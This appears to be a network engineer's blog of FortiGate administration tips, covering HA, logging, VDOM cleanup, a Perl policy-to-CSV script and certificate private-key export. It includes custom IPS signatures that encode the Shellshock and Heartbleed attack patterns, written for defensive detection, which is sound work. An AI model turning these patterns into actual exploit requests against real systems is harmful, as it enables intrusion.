HA with different revision hardware

There may come a time when you have rev.1 and rev.2 hardware of a particular platform that you're trying to form an HA cluster with. To successfully accomplish this you need to tell the firewall to ignore the difference in hardware revision.

In FortiOS 4.3 and earlier:
config system global
set ignore-hardware-revision enable
end

In FortiOS 5.0 and later:
exec ha ignore-hardware-revision enable
exec ha ignore-hardware-revision status

More Shellshock Info

FortiGuard Advisory with status of affected products

FortiGuard Shellshock Blog Post

Bash Vulnerability Signatures

The newly announced Bash / Shellshock vulnerability is document in CVE2014-6271.

Here are IPS rules for immediate manual deployment. Fortinet has already generated
a new IPS signature, Bash.Function.Definitions.Remote.Code.Execution, which will be released in the next few hours after it has passed the QA testing process.

Fortigate firewalls do NOT use Bash and are not vulnerable to this exploit. The rules below can be used to filter traffic destined for devices protected by the firewall.

F-SBID( --name "Bash.Code.Execution.Custom1"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context uri; --pcre "/[=?&\x2f]\s*?\x28\x29\x20\x7b\x20/"; --context uri ; )
F-SBID( --name "Bash.Code.Execution.Custom2"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context header;)
F-SBID( --name "Bash.Code.Execution.Custom3"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context body; --pcre "/(?:^|[=?&])\s*?\x28\x29\x20\x7b\x20/"; --context body ; )
F-SBID( --name "Bash.Code.Execution.Custom4"; --protocol tcp; --service HTTP; --flow from_client; --pattern "()"; --context header; --pattern ":|3b|"; --context header; --within 8; --pattern "}"; --context header; --within 8; --pcre "/(Cookie|Host|Referer):\s*\(\)\s*\{\s*:\x3b\s*\}\s*\x3b/i"; --context header; --distance -32; --within 128; )

Switching interface modes

By default smaller Fortigate units such as the 60D or 90D series combine their interfaces into a virtual switch. Via a configuration change all ports can be assigned to their own broadcast domains. This is useful for example if you want to configure a number of different trunk ports.

By default the firewalls are also configured with basic policies that permit and NAT outbound traffic as well as a DHCP server. These configurations need to be cleared before the switch mode can be changed.

#config firewall policy
#purge

This operation will clear all table!
Do you want to continue? (y/n) y

#end
#config system dhcp server
#purge

This operation will clear all table!
Do you want to continue? (y/n) y

#end
#config system global
#set internal-switch-mode interface
#end

Changing switch mode will reboot the system!
Do you want to continue? (y/n) y

Silence of the Local Broadcasts

When setting up a new FortiGate you tend to receive a lot of logs for traffic destined to 255.255.255.255 (aka the global broadcast address) or x.x.x.255 (your local subnet broadcast address). To reduce clutter and have the firewall drop these broadcasts silently use:

FortiAnalyzer:
config log fortianalyzer filter
    set local-traffic disable
end

Log Disk
config log disk filter filter
    set local-traffic disable
end

Memory:
config log memory filter
    set local-traffic disable
end

Syslog
config log syslogd filter
    set local-traffic disable
end

New Feature Highlight: Dedicated Management CPU

In FortiOS 5.2 and higher you can dedicate one of the CPUs for management access, in other words GUI and CLI access. If the system is running under extremely high loads this will guarantee access to management functions.

This feature is available in 2U firewalls and blades only that have multiple CPUs.

To enable this feature (default disabled):

conf system npu
    set dedicated-management-cpu <enable | disable>
end

Fortinet Diagnostic WIKI

Very useful resource for diagnostic commands.

http://wiki.diagnose.fortinet.com:1080/index.php/Overview

Exporting a local certificate with private key

If you have a local certificate on the Fortigate and the original certificate request (csr) was generated on the Fortigate then the private key resides on the Fortigate and you need to export this in order to install your signed certificate on another server.
The problem with the Fortigate certificate export feature is that it will only export the signed certificate (which you likely already have stored somewhere). The private key is stored in the configuration backup file however it is encrypted with an unknown password.
Luckily there is a workaround available, you can unset the private key password via CLI then back up your configuration file where you’ll find the private key available for use.

config vpn certificate local
show

This will give you a list of the local certificates. Next edit the desired certificate and unset the password

edit testcert
unset password
end

Now when you back up your Fortigate configuration you’ll find the signed certificate as well as the private key.

Look for the following line:

set private-key "-----BEGIN RSA PRIVATE KEY-----

Copy everything between (and including)

-----BEGIN RSA PRIVATE KEY-----
and
-----END RSA PRIVATE KEY-----

into a text file.. This is your private key that can be used with the signed certificate to be imported into another server.

("Borrowed" from http://stuff.purdon.ca/?page_id=233)

Heartbleed - Part 3

Anyone running FortiOS 5.0 GA to 5.0.6 can protect the firewall itself by

• limiting access to the firewall's Admin interface using "Trusted Hosts" in the Admin profiles

or

•  configuring an interface policy as per below

config firewall interface-policy

    edit 1
        set interface "wan1"
        set srcaddr "all"
        set dstaddr "all"
        set service "HTTPS"
        set ips-sensor-status enable
        set ips-sensor "opensslheartbeat"
    next

end

Heartbleed - Part 2

Here is some more information from FortiGuard
http://www.fortiguard.com/advisory/FG-IR-14-011/

Exporting firewall rules to a CSV

Sometimes it can be useful to export and analyze rules in a CSV type format. This comes in especially handy when working with long and complex firewall policies.

I came across the perl script below that takes firewall policies from a text file and performs the CSV conversion for you.

Syntax: csvparse.pl rules.txt

<rules.txt> should be in the following format:

config firewall policy
     edit 1
         set srcintf "internal"
         set dstintf "wan1"
             set srcaddr "all"
             set dstaddr "all"
         set action accept
         set schedule "always"
             set service "ANY"
         set logtraffic-app disable
         set webcache enable
         set nat enable
     next
end

And here's the Perl script.

#!/usr/bin/perl
#

my $output = "policies-out.csv";

my $policyid = 0;
my $setting = "";
my %policies;
my %seen;
my $in_policy_block = 0;
my @order_keys;
my $order_key = 0;

open(OUTFILE,">$output") || die "Can't open file $output: $!\n";

while (<>) {
	if ($in_policy_block) {
		if (/^\s*edit\s+(\d+)/i) {
			# start of new policy
			$policyid = $1;
		} elsif (/^\s*set\s+(\S+)\s+(.*)$/i) {
			# it's a setting
			my ($key,$value) = ($1,$2);
			$value =~ tr/\"\015\012\n\r//d;
			$order_keys[$order_key++] = $key unless $seen{$key}++;
			$policies{$policyid}{$key} = $value;
		} elsif (/^\s*end/i) {
			$in_policy_block = 0;
		}
	} elsif (/^\s*config firewall policy/i) {
		$in_policy_block = 1;
	}
}

# print out our header
print OUTFILE "id";
foreach my $key (@order_keys) {
	print OUTFILE ",$key";
}
print OUTFILE "\n";

# now print out each record
foreach my $policy (sort keys %policies) {
	print OUTFILE "$policy";
	foreach my $key (@order_keys) {
		if (defined($policies{$policy}{$key})) {
			print OUTFILE ",$policies{$policy}{$key}";
		} else {
			print OUTFILE ",";
		}
	}
	print OUTFILE "\n";
}


close(OUTFILE);

Heartbleed OpenSSL Vulnerability

You can use the following custom IPS signature to detect and block the recently disclosed OpenSSL "Heartbleed" vulnerability.

F-SBID( --name "OpenSSL.TLS.Heartbeat.Information.Disclosure"; --protocol tcp;  --flow from_client; --service SSL; --pattern "|18|"; --context packet; --within 1,context; --byte_test 2,>,255,2,relative; )

More information about the vulnerability can be found here:
http://heartbleed.com/

FortiAuthenticator SCEP

You can use SCEP to auto-enroll devices in FortiAuthenticator as well as retrieve CRLs. When configuring this on a firewall or other device the correct URL to use is:

http://<fortiauth IP>/cert/scep

I have asked the technical documentation team to add this to the FortiAuthenticator Admin Guide.

Logging DNS Requests

When inspecting DNS traffic it can be useful to log the domain names that are part of the DNS request. In order to accomplish this you can use a custom IPS signature:

IPS Custom Signature: F-SBID( --attack_id 4153; --name DOM-ALL; --protocol udp; --service dns; --log DNS_QUERY;)

The signature below allows you to search for and prevent DNS lookups for a specified domain, in this example xyz.com.

set signature F-SBID( --name xyz.com; --protocol udp; --service dns; --pattern xyz.com; --context host; --no_case; --default_action drop;)

(Danke C.R)

Deleting VDOMs

VDOMs have quite a number of dependencies that need to be deleted before you can get rid of the VDOM itself. Below is a useful little script that goes through all the sections and purges them so the VDOM can be deleted. Adjust it as needed.

## This script needs to be run interactively. In other words you cannot copy and paste the whole script. You have to acknowledge each purge command.
## Purge all VDOM specific configuration


config vdom
 edit <vdomname>
 config firewall policy
  purge
 end
 config firewall policy6
  purge
 end
 config firewall vipgrp
  purge
 end
 config firewall vip
  purge
 end
 config firewall addrgrp
  purge
 end
 config firewall address
  purge
 end
 config router static
  purge
 end
end

## Assign any interfaces used by the VDOM back to ROOT

config global
 config system interface
    edit <interface name>
    set vdom root
 end
end

## Delete any VDOM Links

config system global
 config system vdom-link
    delete <vdom link name>
 end
end  

## Make sure all admins are assigned to the root VDOM

config system global
 config system admin
  edit <admin-name>
  set vdom root
  end
 end

config vdom
 delete <vdomname>
end

Replacing firewall hardware which is logging to a FortiAnalyzer

When you replace firewall hardware that's reporting into a FortiAnalyzer due to an RMA or other failure it's important to make sure you update FortiAnalyzer with the new serial number of the device. Use the following command on the FAZ:

execute device replace <old serial number> <name> <new serial number>

IP Address Management

I have to admit I'm pretty spoiled when it comes to IPAM. In my previous role I was working with Bluecat Address Manager and loved it. Probably the best purchase order we ever issued :)

For my lab setup I didn't want to drop $30k so I set out looking for a free and open source IPAM tool. My former tool of choice was IPPlan. This hasn't been updated in several years though and IPv6 support is pretty basic.

So over the last few days I have been testing PHPIpam and I have to say I'm very impressed. Not only does it have a really "sexy" web interface but functionally it is very, very closed to what I'm used to from Bluecat.

There is an online demo available here.
http://demo.phpipam.net/login/

UTM logging in Fortios 4.3.7 and 5.x

Significant changes have been made to optimize logging in FortiOS.
Check out this Knowledgebase article for some very useful info.

http://kb.fortinet.com/kb/viewAttachment.do?attachID=FortiOS-v4%200-MR3-Logging-Optimization.pdf&documentID=FD33590

FortiClient mass rollout - Heads up

If you are deploying FortiClient for a large number of users, chances are you'll probably create a master build and image that to the drives you are installing in your machines.
One of the things to keep in mind is that when you install FortiClient it creates a unique UID.

So before you start copying your master build, follow these steps to remove the unique UID. Each individual machine will create a new UID on first use if one doesn't already exist.

To include a FortiClient installation in a hard disk image

• Download the FortiClient tools from the Fortinet Support Site. The tools are located in the same folder as the FortiClient installer files.
• Using an MSI FortiClient installer, install and configure the FortiClient application to suit your requirements. You can use a standard or a customized installation package.
• Right-click the FortiClient icon in the system tray and select Shutdown FortiClient.
• From the folder where you expanded the FortiClientTools.zip file, run RemoveFCTID.exe. The RemoveFCTID tool requires administrative rights.
• Shut down the computer.

IMPORTANT! Do not reboot the Windows operating system on the computer before you create the hard disk image. The FortiClient identifier is created before you log on.

• Create the hard disk image and deploy it as needed.

 

Site-to-Site VPN performance issues

If you are experiencing poor performance across your site-to-site VPNs on FortiOS 5.0.5 try disabling NPU acceleration for that particular tunnel:

config vpn ipsec phase1-interface
edit <vpn name>
set npu-offload disable
end

Strange Bird Phenomenon

Birds all around the world have been spotted flying perfectly fine then diving straight into the ground. One of my customers found the culprit.

Nom nom nom